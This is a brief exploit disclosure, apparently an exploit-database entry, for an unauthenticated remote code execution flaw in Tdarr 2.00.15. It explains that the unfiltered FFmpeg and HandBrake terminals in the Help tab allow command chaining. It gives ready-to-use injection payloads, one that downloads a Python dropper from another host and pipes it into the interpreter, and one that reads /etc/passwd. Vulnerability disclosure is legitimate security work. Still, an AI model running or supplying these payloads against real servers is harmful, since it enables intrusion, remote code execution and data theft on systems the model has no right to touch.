# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

e.g. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default, and no credentials are required to trigger RCE.